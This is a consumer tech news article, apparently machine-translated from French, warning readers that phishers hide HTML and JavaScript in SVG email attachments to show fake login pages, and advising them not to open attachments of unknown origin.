Cyberhackers never lack imagination to carry out their misdeeds. The new fashionable technique consists of relying on SVG files, not necessarily well known to the general public.
You should always be wary of attachments in emails. Long used in large-scale hacking campaigns, these files can be much more malicious than they appear. And after relying on stupid .PNG and .JPG images, the most fashionable cybercriminals have now moved to .SVG, note Bleeping Computer.
What is an SVG file?
Acronym of Scalable Vector Graphics.SVG files are therefore, as their name suggests, vector images. That is, rather than encoding information pixel by pixel, they contain code “describing” the image. For example, to create a red colored line of 100 px, an SVG file will simply specify the thickness, length and color of the line, whereas a “classic” JPG file will have to indicate one by one the content of the 100 pixels that constitute the line.
Very effective for generating “simple” shapes, such as graphics or logos, SVG files are especially appreciated for their ability to adapt to any screen resolution. Since it's just interpreting code and not deciphering an image at a fixed pixel count, SVG files can appear as large or as small as needed, without losing quality.
An SVG image designed to take up 30% of the available screen will be displayed in the same way, and without losing quality, on a phone screen or on a 55-inch TV.
Why is it dangerous?
But then why are SVG files now popular with cybercriminals of all kinds? Well, as noted Bleeping Computerwhich is based on research carried out by the MalwareHunterTeam collective, SVG files allow HTML code to be embedded and JavaScript elements to be executed when opened.
If all that doesn't enlighten you any further, this means that an .SVG image can almost pass for an interactive website. Thus, it becomes easy to create fake sites from scratch with fake login guests to steal usernames or passwords.
To go further
“Your box was too bulky for the mailbox”: watch out for this new scam that imitates La Poste
Unfortunately, because malicious code is often hidden behind the stupid description of an image, many antivirus programs do not immediately detect the threat. To protect yourself from any problem, therefore, do not open attachments whose origin you do not know and if you do not work with SVG files, ESPECIALLY do not open these attachments.
Join us from 5 to 7 p.m., every other Thursday, for the show UNLOCK produced by Frandroid et Numerama ! Tech news, interviews, tips and analyses… See you live on Twitch or rebroadcast on YouTube!
Related News :